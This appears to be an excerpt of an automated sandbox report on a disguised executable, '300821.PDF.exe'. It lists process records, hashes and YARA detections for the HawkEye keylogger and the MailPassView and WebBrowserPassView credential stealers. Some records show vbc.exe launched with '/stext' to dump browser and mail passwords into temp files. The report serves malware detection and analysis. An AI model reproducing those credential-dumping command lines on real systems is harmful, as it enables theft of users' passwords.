• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.666209862.000000000400E000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 06:55:05
Start date: 30/08/2021
Path: C:\Users\user\Desktop\300821.PDF.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\300821.PDF.exe
Imagebase: 0x6f0000
File size: 987136 bytes
MD5 hash: DDFC57B8FD3E5E0F81DEE8EAD0E38518
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, Author: Joe Security
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.914785913.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 06:55:15
Start date: 30/08/2021
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.693074434.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 06:55:15
Start date: 30/08/2021
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000009.00000002.684649797.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

Disassembly

Code Analysis
